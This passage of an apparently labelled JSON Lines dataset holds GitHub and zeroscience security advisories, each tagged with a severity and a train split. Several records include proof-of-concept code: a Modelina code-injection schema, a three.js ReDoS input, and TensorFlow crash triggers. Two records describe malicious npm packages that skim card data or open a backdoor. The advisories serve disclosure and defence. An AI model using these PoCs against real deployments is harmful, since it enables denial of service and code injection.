JSON Schema here for simplicity.\n```ts\nconst jsonSchemaDoc = {\n $id: 'CustomClass',\n type: 'object',\n properties: {\n 'property: any; \\n constructor(){console.log(\"injected\")} \\n private _temp': { type: 'string' },\n }\n};\ngenerator = new TypeScriptGenerator(\n { \n presets: [\n {\n class: {\n property({ propertyName, content }) {\n return `private ${propertyName}: any;`;\n },\n ctor() {\n return '';\n },\n getter() {\n return '';\n },\n setter() {\n return '';\n }\n }\n }\n ]\n }\n);\nconst inputModel = await generator.process(jsonSchemaDoc);\n```\nThis would render\n```ts\nexport class CustomClass {\n private property: any; \n constructor(){console.log(\"injected\")} \n private _temp: any;\n private additionalProperties: any;\n}\n```", "text_raw": "Improper Control of Generation of Code ('Code Injection') in @asyncapi/modelina\n\n[Severity: CRITICAL]\n\n### Impact\nAnyone who is using the default presets and/or does not handle the functionality themself.\n\n### Patches\nIt is impossible to fully guard against this, because users have access to the original raw information. However, as of version 1, if you only access the constrained models, you will not encounter this issue.\n\nFurther similar situations are NOT seen as a security issue, but intended behavior.\n\n### Workarounds\nFully custom presets that change the entire rendering process which can then escape the user input.\n\n### For more information\nEven though that I changed all the presets here, the vulnerability is still present throughout. I am using a JSON Schema here for simplicity.\n```ts\nconst jsonSchemaDoc = {\n $id: 'CustomClass',\n type: 'object',\n properties: {\n 'property: any; \\n constructor(){console.log(\"injected\")} \\n private _temp': { type: 'string' },\n }\n};\ngenerator = new TypeScriptGenerator(\n { \n presets: [\n {\n class: {\n property({ propertyName, content }) {\n return `private ${propertyName}: any;`;\n },\n ctor() {\n return '';\n },\n getter() {\n return '';\n },\n setter() {\n return '';\n }\n }\n }\n ]\n }\n);\nconst inputModel = await generator.process(jsonSchemaDoc);\n```\nThis would render\n```ts\nexport class CustomClass {\n private property: any; \n constructor(){console.log(\"injected\")} \n private _temp: any;\n private additionalProperties: any;\n}\n```", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-09-21", "split": "train"} -{"id": "72425c9e5c28cb33c717", "text": "XML External Entity vulnerability in MODX CMS\n\nA XML External Entity (XXE) vulnerability was discovered in the modRestServiceRequest component in MODX CMS 2.7.3 which can lead to an information disclosure or denial of service (DOS).", "text_raw": "XML External Entity vulnerability in MODX CMS\n\n[Severity: CRITICAL]\n\nA XML External Entity (XXE) vulnerability was discovered in the modRestServiceRequest component in MODX CMS 2.7.3 which can lead to an information disclosure or denial of service (DOS).", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-11-01", "split": "train"} -{"id": "e31c660c8b81dca0c2d3", "text": "Denial of Service in grpc-ts-health-check\n\nVersions of `grpc-ts-health-check` prior to 2.0.0 are vulnerable to Denial of Service. The package exposes an API endpoint that may allow attackers to set the service's health status to failing. This can lead to Denial of Service as Kubernetes blocks traffic to services with a failing status.\n\n## Recommendation\n\nUpgrade to version 2.0.0 or later.", "text_raw": "Denial of Service in grpc-ts-health-check\n\n[Severity: LOW]\n\nVersions of `grpc-ts-health-check` prior to 2.0.0 are vulnerable to Denial of Service. The package exposes an API endpoint that may allow attackers to set the service's health status to failing. This can lead to Denial of Service as Kubernetes blocks traffic to services with a failing status.\n\n\n## Recommendation\n\nUpgrade to version 2.0.0 or later.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "ed318f9687c92be6b6bf", "text": "django-celery-results Stores Sensitive Information In Cleartext\n\ndjango-celery-results prior to 2.4.0 stores task results in the database. Among the data it stores are the variables passed into the tasks. The variables may contain sensitive cleartext information that does not belong unencrypted in the database.\n\nIn version 2.4.0 this is no longer the default behaviour but can be re-enabled with the `result_extended` flag in which case care should be taken to ensure any sensitive variables are scrubbed - see [here](https://github.com/celery/django-celery-results/issues/154#issuecomment-734706270) for an example.", "text_raw": "django-celery-results Stores Sensitive Information In Cleartext\n\n[Severity: HIGH]\n\ndjango-celery-results prior to 2.4.0 stores task results in the database. Among the data it stores are the variables passed into the tasks. The variables may contain sensitive cleartext information that does not belong unencrypted in the database.\n\nIn version 2.4.0 this is no longer the default behaviour but can be re-enabled with the `result_extended` flag in which case care should be taken to ensure any sensitive variables are scrubbed - see [here](https://github.com/celery/django-celery-results/issues/154#issuecomment-734706270) for an example.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-06-04", "split": "train"} -{"id": "f6013d9f0d8ea64c3717", "text": "Improper Restriction of XML External Entity Reference (XXE) in Nokogiri on JRuby\n\n### Severity\n\n### Impact\n\nIn Nokogiri v1.12.4 and earlier, **on JRuby only**, the SAX parser resolves external entities by default.\n\nUsers of Nokogiri on JRuby who parse untrusted documents using any of these classes are affected:\n\n- Nokogiri::XML::SAX::Parser\n- Nokogiri::HTML4::SAX::Parser or its alias Nokogiri::HTML::SAX::Parser\n- Nokogiri::XML::SAX::PushParser\n- Nokogiri::HTML4::SAX::PushParser or its alias Nokogiri::HTML::SAX::PushParser\n\n### Mitigation\n\nJRuby users should upgrade to Nokogiri v1.12.5 or later. There are no workarounds available for v1.12.4 or earlier.\n\nCRuby users are not affected.", "text_raw": "Improper Restriction of XML External Entity Reference (XXE) in Nokogiri on JRuby\n\n[Severity: HIGH]\n\n### Severity\n\nThe Nokogiri maintainers have evaluated this as [**High Severity** 7.5 (CVSS3.0)](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C/MAV:N/MAC:L) for JRuby users. (This security advisory does not apply to CRuby users.)\n\n\n### Impact\n\nIn Nokogiri v1.12.4 and earlier, **on JRuby only**, the SAX parser resolves external entities by default.\n\nUsers of Nokogiri on JRuby who parse untrusted documents using any of these classes are affected:\n\n- Nokogiri::XML::SAX::Parser\n- Nokogiri::HTML4::SAX::Parser or its alias Nokogiri::HTML::SAX::Parser\n- Nokogiri::XML::SAX::PushParser\n- Nokogiri::HTML4::SAX::PushParser or its alias Nokogiri::HTML::SAX::PushParser\n\n\n### Mitigation\n\nJRuby users should upgrade to Nokogiri v1.12.5 or later. There are no workarounds available for v1.12.4 or earlier.\n\nCRuby users are not affected.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-09-27", "split": "train"} -{"id": "a66d870e2917233d1dcd", "text": "Data races in max7301\n\nThe `ImmediateIO` and `TransactionalIO` types implement `Sync` for all contained\n`Expander` types regardless of if the `Expander` itself is safe to use\nacross threads.\n\nAs the `IO` types allow retrieving the `Expander`, this can lead to non-thread\nsafe types being sent across threads as part of the `Expander` leading to data\nraces.", "text_raw": "Data races in max7301\n\n[Severity: MEDIUM]\n\nThe `ImmediateIO` and `TransactionalIO` types implement `Sync` for all contained\n`Expander` types regardless of if the `Expander` itself is safe to use\nacross threads.\n\nAs the `IO` types allow retrieving the `Expander`, this can lead to non-thread\nsafe types being sent across threads as part of the `Expander` leading to data\nraces.\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "8cb49fef1cb61afaff76", "text": "Improper Restriction of Rendered UI Layers or Frames in Keycloak\n\nA vulnerability was found in all versions of Keycloak where, the pages on the Admin Console area of the application are completely missing general HTTP security headers in HTTP-responses. This does not directly lead to a security issue, yet it might aid attackers in their efforts to exploit other problems. The flaws unnecessarily make the servers more prone to Clickjacking, channel downgrade attacks and other similar client-based attack vectors.", "text_raw": "Improper Restriction of Rendered UI Layers or Frames in Keycloak\n\n[Severity: MEDIUM]\n\nA vulnerability was found in all versions of Keycloak where, the pages on the Admin Console area of the application are completely missing general HTTP security headers in HTTP-responses. This does not directly lead to a security issue, yet it might aid attackers in their efforts to exploit other problems. The flaws unnecessarily make the servers more prone to Clickjacking, channel downgrade attacks and other similar client-based attack vectors.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-04-15", "split": "train"} -{"id": "6361a363cbcc557ca512", "text": "Denial of service in three\n\nThis affects the package three before 0.125.0. This can happen when handling rgb or hsl colors.\n\n**PoC:** \n```js\nvar three = require('three')\nfunction build_blank(n) {\n var ret = \"rgb(\"\n for (var i = 0; i < n; i++) {\n ret += \" \"\n }\n return ret + \"\";\n}\nvar Color = three.Color\nvar time = Date.now();\nnew Color(build_blank(50000)) var time_cost = Date.now() - time;\nconsole.log(time_cost + \" ms\")\n```", "text_raw": "Denial of service in three\n\n[Severity: HIGH]\n\nThis affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. \n\n**PoC:** \n```js\nvar three = require('three')\nfunction build_blank(n) {\n var ret = \"rgb(\"\n for (var i = 0; i < n; i++) {\n ret += \" \"\n }\n return ret + \"\";\n}\nvar Color = three.Color\nvar time = Date.now();\nnew Color(build_blank(50000)) var time_cost = Date.now() - time;\nconsole.log(time_cost + \" ms\")\n```", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-03-01", "split": "train"} -{"id": "bf5da0b4b299a0c76fdc", "text": "Incorrect implementation in streebog\n\nInternal update-sigma function was implemented incorrectly and depending on debug-assertions it could've caused an incorrect result or panic for certain inputs.", "text_raw": "Incorrect implementation in streebog\n\n[Severity: HIGH]\n\nInternal update-sigma function was implemented incorrectly and depending on debug-assertions it could've caused an incorrect result or panic for certain inputs.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "11d8c3de6ad1865800c9", "text": "Malicious Package in react-datepicker-plus\n\nVersions 2.4.3 and 2.4.2 of `react-datepicker-plus` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n## Recommendation\n\nRemove the package from your environment and evaluate your application to determine whether or not user data was compromised.", "text_raw": "Malicious Package in react-datepicker-plus\n\n[Severity: CRITICAL]\n\nVersions 2.4.3 and 2.4.2 of `react-datepicker-plus` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n\n\n## Recommendation\n\nRemove the package from your environment and evaluate your application to determine whether or not user data was compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-11", "split": "train"} -{"id": "d0a7adf7fd9e4a71e8ec", "text": "No CSRF protection on the password change form\n\n### Impact\nIt's possible for forge an URL that, when accessed by an admin, will reset the password of any user in XWiki.\n\n### Patches\nThe problem has been patched in XWiki 12.10.5, 13.2RC1.\n\n### Workarounds\nIt's possible to apply the patch manually by modifying the `register_macros.vm` template like in https://github.com/xwiki/xwiki-platform/commit/0a36dbcc5421d450366580217a47cc44d32f7257.\n\n### References\nhttps://jira.xwiki.org/browse/XWIKI-18315\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira XWiki](https://jira.xwiki.org)\n* Email us at [security ML](mailto:security@xwiki.org)", "text_raw": "No CSRF protection on the password change form\n\n[Severity: MEDIUM]\n\n### Impact\nIt's possible for forge an URL that, when accessed by an admin, will reset the password of any user in XWiki.\n\n### Patches\nThe problem has been patched in XWiki 12.10.5, 13.2RC1.\n\n### Workarounds\nIt's possible to apply the patch manually by modifying the `register_macros.vm` template like in https://github.com/xwiki/xwiki-platform/commit/0a36dbcc5421d450366580217a47cc44d32f7257.\n\n### References\nhttps://jira.xwiki.org/browse/XWIKI-18315\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira XWiki](https://jira.xwiki.org)\n* Email us at [security ML](mailto:security@xwiki.org)\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-07-02", "split": "train"} -{"id": "b5113c29feac8d5a2b61", "text": "Unauthenticated Remote Code Execution in Apache JMeter\n\nUnauthenticated RCE is possible when JMeter is used in distributed mode (-r or -R command line options). Attacker can establish a RMI connection to a jmeter-server using RemoteJMeterEngine and proceed with an attack using untrusted data deserialization. This only affect tests running in Distributed mode. Note that versions before 4.0 are not able to encrypt traffic between the nodes, nor authenticate the participating nodes so upgrade to JMeter 5.1 is also advised.", "text_raw": "Unauthenticated Remote Code Execution in Apache JMeter\n\n[Severity: CRITICAL]\n\nUnauthenticated RCE is possible when JMeter is used in distributed mode (-r or -R command line options). Attacker can establish a RMI connection to a jmeter-server using RemoteJMeterEngine and proceed with an attack using untrusted data deserialization. This only affect tests running in Distributed mode. Note that versions before 4.0 are not able to encrypt traffic between the nodes, nor authenticate the participating nodes so upgrade to JMeter 5.1 is also advised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2019-03-07", "split": "train"} -{"id": "f292547c6d02ae6afd2b", "text": "Data races in rcu_cell\n\nAffected versions of this crate unconditionally implement Send/Sync for `RcuCell`.\nThis allows users to send `T: !Send` to other threads (while `T` enclosed within `RcuCell`), and allows users to concurrently access `T: !Sync` by using the APIs of `RcuCell` that provide access to `&T`.\n\nThis can result in memory corruption caused by data races.", "text_raw": "Data races in rcu_cell\n\n[Severity: HIGH]\n\nAffected versions of this crate unconditionally implement Send/Sync for `RcuCell`.\nThis allows users to send `T: !Send` to other threads (while `T` enclosed within `RcuCell`), and allows users to concurrently access `T: !Sync` by using the APIs of `RcuCell` that provide access to `&T`.\n\nThis can result in memory corruption caused by data races.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "fbf56f8bcfa1cc4bc1be", "text": "Heap OOB read in `tf.raw_ops.SparseCountSparseOutput`\n\n### Impact\nThe [shape inference functions for `SparseCountSparseOutput`](https://github.com/tensorflow/tensorflow/blob/e0b6e58c328059829c3eb968136f17aa72b6c876/tensorflow/core/ops/count_ops.cc#L43-L50) can trigger a read outside of bounds of heap allocated array:\n\n```python\nimport tensorflow as tf\n\n@tf.function\ndef func():\n return tf.raw_ops.SparseCountSparseOutput(\n indices=[1],\n values=[[1]],\n dense_shape=[10],\n weights=[],\n binary_output= True)\n\nfunc()\n```\n\nThe function fails to check that the first input (i.e., `indices`) has rank 2:\n\n```cc\n auto rank = c->Dim(c->input(0), 1);\n```\n\n### Patches\nWe have patched the issue in GitHub commit [701cfaca222a82afbeeb17496bd718baa65a67d2](https://github.com/tensorflow/tensorflow/commit/701cfaca222a82afbeeb17496bd718baa65a67d2).\n\nThe fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "text_raw": "Heap OOB read in `tf.raw_ops.SparseCountSparseOutput`\n\n[Severity: HIGH]\n\n### Impact\nThe [shape inference functions for `SparseCountSparseOutput`](https://github.com/tensorflow/tensorflow/blob/e0b6e58c328059829c3eb968136f17aa72b6c876/tensorflow/core/ops/count_ops.cc#L43-L50) can trigger a read outside of bounds of heap allocated array:\n\n```python\nimport tensorflow as tf\n\n@tf.function\ndef func():\n return tf.raw_ops.SparseCountSparseOutput(\n indices=[1],\n values=[[1]],\n dense_shape=[10],\n weights=[],\n binary_output= True)\n\nfunc()\n```\n\nThe function fails to check that the first input (i.e., `indices`) has rank 2:\n\n```cc\n auto rank = c->Dim(c->input(0), 1);\n```\n\n### Patches\nWe have patched the issue in GitHub commit [701cfaca222a82afbeeb17496bd718baa65a67d2](https://github.com/tensorflow/tensorflow/commit/701cfaca222a82afbeeb17496bd718baa65a67d2).\n\nThe fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-11-10", "split": "train"} -{"id": "d3a7e66d55c89d9abeec", "text": "Realtyna RPL 8.9.2 Joomla Extension Multiple SQL Injection Vulnerabilities", "text_raw": "Realtyna RPL 8.9.2 Joomla Extension Multiple SQL Injection Vulnerabilities\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2015-10-22", "split": "train"} -{"id": "4d56a119872b2eb0d2ae", "text": "rbovirt uses the rest-client gem with SSL verification disabled\n\nThe rbovirt gem before 0.0.24 for Ruby uses the rest-client gem with SSL verification disabled, which allows remote attackers to conduct man-in-the-middle attacks via unspecified vectors.", "text_raw": "rbovirt uses the rest-client gem with SSL verification disabled\n\n[Severity: MEDIUM]\n\nThe rbovirt gem before 0.0.24 for Ruby uses the rest-client gem with SSL verification disabled, which allows remote attackers to conduct man-in-the-middle attacks via unspecified vectors.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "dd4d66fb22cff9cf30ec", "text": "Malicious Package in uglyfi.js\n\nVersion 0.17.3 of `uglyfi.js` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opens a backdoor.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in uglyfi.js\n\n[Severity: CRITICAL]\n\nVersion 0.17.3 of `uglyfi.js` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opens a backdoor.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "fe7d1b448ef7250b6b42", "text": "Access of Uninitialized Pointer in linked-hash-map\n\nAn issue was discovered in the linked-hash-map crate before 0.5.3 for Rust. It creates an uninitialized NonNull pointer, which violates a non-null constraint.", "text_raw": "Access of Uninitialized Pointer in linked-hash-map\n\n[Severity: CRITICAL]\n\nAn issue was discovered in the linked-hash-map crate before 0.5.3 for Rust. It creates an uninitialized NonNull pointer, which violates a non-null constraint.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "a7e524242a31465d2ae0", "text": "Improper Privilege Management in Apache Karaf\n\nIn Apache Karaf prior to 4.2.0 release, if the sshd service in Karaf is left on so an administrator can manage the running instance, any user with rights to the Karaf console can pivot and read/write any file on the file system to which the Karaf process user has access. This can be locked down a bit by using chroot to change the root directory to protect files outside of the Karaf install directory; it can be further locked down by defining a security manager policy that limits file system access to those directories beneath the Karaf home that are necessary for the system to run. However, this still allows anyone with ssh access to the Karaf process to read and write a large number of files as the Karaf process user.", "text_raw": "Improper Privilege Management in Apache Karaf\n\n[Severity: HIGH]\n\nIn Apache Karaf prior to 4.2.0 release, if the sshd service in Karaf is left on so an administrator can manage the running instance, any user with rights to the Karaf console can pivot and read/write any file on the file system to which the Karaf process user has access. This can be locked down a bit by using chroot to change the root directory to protect files outside of the Karaf install directory; it can be further locked down by defining a security manager policy that limits file system access to those directories beneath the Karaf home that are necessary for the system to run. However, this still allows anyone with ssh access to the Karaf process to read and write a large number of files as the Karaf process user.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-12-21", "split": "train"} -{"id": "5c61277e34aa9556cda6", "text": "Division by 0 in `Conv2DBackpropFilter`\n\n### Impact\nAn attacker can trigger a division by 0 in `tf.raw_ops.Conv2DBackpropFilter`:\n\n```python\nimport tensorflow as tf\n\ninput_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32)\nfilter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32)\nout_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32)\n\ntf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes,\n out_backprop=out_backprop,\n strides=[1, 66, 18, 1], use_cudnn_on_gpu=True,\n padding='SAME', explicit_paddings=[],\n data_format='NHWC', dilations=[1, 1, 1, 1])\n```\n\nThis is because the [implementation](https://github.com/tensorflow/tensorflow/blob/496c2630e51c1a478f095b084329acedb253db6b/tensorflow/core/kernels/conv_grad_shape_utils.cc#L130) does a modulus operation where the divisor is controlled by the caller:\n\n```cc \n if (dims->in_depth % filter_shape.dim_size(num_dims - 2)) { ... }\n```\n\n### Patches\nWe have patched the issue in GitHub commit [fca9874a9b42a2134f907d2fb46ab774a831404a](https://github.com/tensorflow/tensorflow/commit/fca9874a9b42a2134f907d2fb46ab774a831404a).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.", "text_raw": "Division by 0 in `Conv2DBackpropFilter`\n\n[Severity: LOW]\n\n### Impact\nAn attacker can trigger a division by 0 in `tf.raw_ops.Conv2DBackpropFilter`:\n\n```python\nimport tensorflow as tf\n\ninput_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32)\nfilter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32)\nout_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32)\n\ntf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes,\n out_backprop=out_backprop,\n strides=[1, 66, 18, 1], use_cudnn_on_gpu=True,\n padding='SAME', explicit_paddings=[],\n data_format='NHWC', dilations=[1, 1, 1, 1])\n``` \n \nThis is because the [implementation](https://github.com/tensorflow/tensorflow/blob/496c2630e51c1a478f095b084329acedb253db6b/tensorflow/core/kernels/conv_grad_shape_utils.cc#L130) does a modulus operation where the divisor is controlled by the caller:\n\n```cc \n if (dims->in_depth % filter_shape.dim_size(num_dims - 2)) { ... }\n```\n \n### Patches\nWe have patched the issue in GitHub commit [fca9874a9b42a2134f907d2fb46ab774a831404a](https://github.com/tensorflow/tensorflow/commit/fca9874a9b42a2134f907d2fb46ab774a831404a).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n \n### Attribution\nThis vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-05-21", "split": "train"} -{"id": "a8fcfe5c7eaa9f14d0e4", "text": "Directory Traversal\n\nAffected versions of node-simple-router package (0.10.0 and before), are vulnerable to a directory traversal issue.", "text_raw": "Directory Traversal\n\n[Severity: HIGH]\n\nAffected versions of node-simple-router package (0.10.0 and before), are vulnerable to a directory traversal issue.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-02-23", "split": "train"} -{"id": "d1ca2c60cab8e4458bed", "text": "Cross-site Scripting in GilaCMS\n\nA stored cross-site scripting (XSS) vulnerability in GilaCMS v1.11.4 allows attackers to execute arbitrary web scripts or HTML via a crafted SVG file.", "text_raw": "Cross-site Scripting in GilaCMS\n\n[Severity: MEDIUM]\n\nA stored cross-site scripting (XSS) vulnerability in GilaCMS v1.11.4 allows attackers to execute arbitrary web scripts or HTML via a crafted SVG file.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-09-30", "split": "train"} -{"id": "4f42e5f46039ea6658b7", "text": "Cross-Site Request Forgery in GilaCMS\n\nA Cross-Site Request Forgery (CSRF) in GilaCMS v1.11.4 allows authenticated attackers to arbitrarily add administrator accounts.", "text_raw": "Cross-Site Request Forgery in GilaCMS\n\n[Severity: HIGH]\n\nA Cross-Site Request Forgery (CSRF) in GilaCMS v1.11.4 allows authenticated attackers to arbitrarily add administrator accounts.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-09-30", "split": "train"} -{"id": "80f2fd8776dfecf42546", "text": "OSGi applications using Vaadin 12-14 and 19 vulnerable to server classes and resources exposure\n\nVulnerability in OSGi integration in `com.vaadin:flow-server` versions 1.2.0 through 2.4.7 (Vaadin 12.0.0 through 14.4.9), and 6.0.0 through 6.0.1 (Vaadin 19.0.0) allows attacker to access application classes and resources on the server via crafted HTTP request.\n\n- https://vaadin.com/security/cve-2021-31407", "text_raw": "OSGi applications using Vaadin 12-14 and 19 vulnerable to server classes and resources exposure\n\n[Severity: HIGH]\n\nVulnerability in OSGi integration in `com.vaadin:flow-server` versions 1.2.0 through 2.4.7 (Vaadin 12.0.0 through 14.4.9), and 6.0.0 through 6.0.1 (Vaadin 19.0.0) allows attacker to access application classes and resources on the server via crafted HTTP request.\n\n- https://vaadin.com/security/cve-2021-31407", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-04-19", "split": "train"} -{"id": "bb6de13721167c40560a", "text": "Code injection in kill-process-by-name\n\nThis affects all versions of package kill-process-by-name. If (attacker-controlled) user input is given, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization in the index.js file.", "text_raw": "Code injection in kill-process-by-name\n\n[Severity: CRITICAL]\n\nThis affects all versions of package kill-process-by-name. If (attacker-controlled) user input is given, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization in the index.js file.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-03-19", "split": "train"} -{"id": "792f93a1f3df83590bb0", "text": "Plone Cross-site Scripting vulnerability\n\nCross-site scripting (XSS) vulnerability in the safe_html filter in Products.PortalTransforms in Plone 2.1 through 4.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2010-2422.", "text_raw": "Plone Cross-site Scripting vulnerability\n\n[Severity: MEDIUM]\n\nCross-site scripting (XSS) vulnerability in the safe_html filter in Products.PortalTransforms in Plone 2.1 through 4.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2010-2422.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-07-23", "split": "train"} -{"id": "2518f3f9e9abc8eaefcf", "text": "Cross-site scripting (XSS) vulnerability in DotNetNuke (DNN) before 7.4.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", "text_raw": "Moderate severity vulnerability that affects DotNetNuke.Core\n\n[Severity: MEDIUM]\n\nCross-site scripting (XSS) vulnerability in DotNetNuke (DNN) before 7.4.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-10-16", "split": "train"} -{"id": "1d0f1146191f7fba6ff2", "text": "iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion Vulnerability", "text_raw": "iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2011-09-16", "split": "train"} -{"id": "3c093a39fc4ce494248f", "text": "XML External Entity (XXE) Injection in Jackson Databind\n\nA flaw was found in FasterXML Jackson Databind, where it did not have entity expansion secured properly. This flaw allows vulnerability to XML external entity (XXE) attacks. The highest threat from this vulnerability is data integrity.", "text_raw": "XML External Entity (XXE) Injection in Jackson Databind\n\n[Severity: HIGH]\n\nA flaw was found in FasterXML Jackson Databind, where it did not have entity expansion secured properly. This flaw allows vulnerability to XML external entity (XXE) attacks. The highest threat from this vulnerability is data integrity.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-02-18", "split": "train"} -{"id": "0f035323ab7289606280", "text": "Cross-site Scripting in Eclipse Jetty\n\nIn Eclipse Jetty version 9.2.26 and older, 9.3.25 and older, and 9.4.15 and older, the server is vulnerable to XSS conditions if a remote client USES a specially formatted URL against the DefaultServlet or ResourceHandler that is configured for showing a Listing of directory contents.", "text_raw": "Cross-site Scripting in Eclipse Jetty\n\n[Severity: MEDIUM]\n\nIn Eclipse Jetty version 9.2.26 and older, 9.3.25 and older, and 9.4.15 and older, the server is vulnerable to XSS conditions if a remote client USES a specially formatted URL against the DefaultServlet or ResourceHandler that is configured for showing a Listing of directory contents.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-04-23", "split": "train"} -{"id": "f5d05219d67c0697e08c", "text": "FLIR Systems FLIR Thermal Camera FC-S/PT Authenticated OS Command Injection", "text_raw": "FLIR Systems FLIR Thermal Camera FC-S/PT Authenticated OS Command Injection\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2017-09-25", "split": "train"} -{"id": "67ee345daaffa9ce0377", "text": "Use after free in string-interner\n\nAffected versions of this crate did not clone contained strings when an interner is cloned. Interners have raw pointers to the contained strings, and they keep pointing the strings which the old interner owns, after the interner is cloned. If a new cloned interner is alive and the old original interner is dead, the new interner has dangling pointers to the old interner's storage, which is already dropped.\n\nThis allows an attacker to read the already freed memory. The dangling pointers are used by the interners to check a string is already interned. An attacker can do brute force attack to get the data pointed by the dangling pointer.", "text_raw": "Use after free in string-interner\n\n[Severity: 